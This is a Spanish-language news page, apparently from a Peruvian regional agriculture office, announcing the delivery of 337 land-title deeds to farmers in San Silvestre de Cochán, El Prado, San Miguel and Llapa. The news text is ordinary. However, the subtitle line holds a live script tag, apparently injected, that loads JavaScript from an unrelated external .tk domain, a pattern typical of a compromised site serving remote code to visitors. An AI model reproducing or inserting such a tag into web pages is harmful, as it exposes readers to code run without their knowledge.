Ingresar

MÁS TÍTULOS DE PROPIEDAD SERÁN ENTREGADOS EN SAN MIGUEL

Miércoles, 6 Marzo, 2013 - 12:44
San Silvestre de Cochán, El Prado, San Miguel y Llapa dentro de los distritos beneficiados<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

La titulación de tierras -el registro formal de tierras que anteriormente eran utilizadas sin un título- es una política de desarrollo que viene llevando a cabo la Dirección Regional de Agricultura, a través de la Dirección de Titulación de Tierras y Catastro Rural. Como la inseguridad en la tenencia de la tierra se percibe como un freno significativo al desarrollo, el propósito de la titulación es facilitar el acceso al crédito formal, alentar la inversión en las tierras y, por tanto, incrementar la productividad y producción agrícolas. También es posible que, con derechos de propiedad asegurados, los agricultores se conviertan en mejores administradores de la tierra y que adopten técnicas de conservación.

Además de facilitar el acceso al crédito, el objetivo de los títulos es incrementar el sentido de seguridad de la tenencia entre los propietarios para que estos tengan más posibilidades de hacer inversiones en prácticas que intensifiquen la viabilidad de la produccion agrícola a largo plazo, tales como instalar sistemas de irrigación. Si los agricultores temen al desalojo y no tienen certeza de si podrán disfrutar de los futuros beneficios de su inversión, serán renuentes a realizarla.

Por ello, el Director Regional de Titulación de Tierras y Catastro Rural, Dr. Ronald Salazar Chávez; anunció la entrega masiva de 337 títulos de propiedad, en el Distrito de San Silvestre de Cochán, Provincia de San Miguel. Los beneficiarios son agricultores del mencionado Distrito, además de los distritos de El Prado, San Miguel y LLapa. Dicho acto se desarrollará el día viernes 8 del presente mes en la Plaza de Armas de la Municipalidad Distrital de San Silvestre de Cochán contando con la presencia de autoridades locales y regionales.

“La actividad a desarrollar está programada dentro del desarrollo de nuestro plan de trabajo buscando como único objetivo el erradicar progresivamente la informalidad de la tenencia de las tierras en la Región Cajamarca”, mencionó el Dr. Ronald Salazar.

AdjuntoTamaño
PDF icon NOTA 25.pdf731.18 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen